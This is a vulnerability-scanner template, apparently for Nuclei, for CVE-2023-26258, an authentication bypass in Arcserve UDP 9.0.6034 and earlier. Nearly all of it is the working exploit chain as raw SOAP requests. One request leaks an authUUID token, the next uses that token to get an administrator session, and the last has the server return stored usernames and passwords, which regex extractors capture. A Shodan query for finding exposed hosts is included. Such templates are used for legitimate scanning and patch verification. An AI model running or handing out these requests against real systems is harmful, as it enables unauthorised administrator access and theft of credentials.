复制
id: CVE-2023-26258
info:
name: Arcserve UDP <= 9.0.6034 - Authentication Bypass
author: daffainfo
severity: critical
description: |
Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
reference:
- https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
- https://nvd.nist.gov/vuln/detail/CVE-2023-26258
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-26258
epss-score: 0.85528
epss-percentile: 0.99329
cwe-id: CWE-863
cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: arcserve
product: udp
shodan-query: http.favicon.hash:-1889244460
tags: cve,cve2023,arcserve,auth-bypass
flow: http(1) && http(2)
http:
- raw:
- |
POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
<S:Body>
<ns2:getVersionInfo
xmlns:ns2="http://webservice.arcflash.ca.com"
xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
xmlns:ns13="http://webservice.edge.arcserve.ca.com/"/>
</S:Body>
</S:Envelope>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains(body, "ns5:authUUID")'
condition: and
internal: true
extractors:
- type: regex
name: auth_uuid
group: 1
part: body
internal: true
regex:
- '<ns5:authUUID>([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})</ns5:authUUID>'
- raw:
- |
POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
Host: {{Hostname}}
SOAPAction: "<http://webservice.arcflash.ca.com/IEdgeDashboardService/validateUserByUUIDRequest>"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
<S:Body>
<ns2:validateUserByUUID
xmlns:ns2="http://webservice.arcflash.ca.com"
xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
xmlns:ns13="http://webservice.edge.arcserve.ca.com/">
<arg0>{{auth_uuid}}</arg0>
</ns2:validateUserByUUID>
</S:Body>
</S:Envelope>
- |
POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
Host: {{Hostname}}
SOAPAction: "<http://webservice.arcflash.ca.com/IFlashService_R16_5/getVersionInfoRequest>"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
<S:Body>
<ns2:getLocalHostAsTrust
xmlns:ns2="http://webservice.arcflash.ca.com"
xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
xmlns:ns13="http://webservice.edge.arcserve.ca.com/"
>
</ns2:getLocalHostAsTrust>
</S:Body>
</S:Envelope>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains_all(body, "ns5:uuid", "ns5:userName", "ns5:password")'
condition: and
extractors:
- type: regex
group: 1
part: body
regex:
- '<ns5:userName>(.*?)</ns5:userName>'
- type: regex
group: 1
part: body
regex:
- '<ns5:password>(.*?)</ns5:password>'
# digest: 4a0a00473045022062a3ea41ba3da6d29e8b97e43202b2317951723f588cddc3a9b37fde8d2763af0221009c93e94d090f86e87b295d1a630fd01381209aeed3cd66ceda77372a7d3b050d:922c64590222798bb761d5b6d8e72950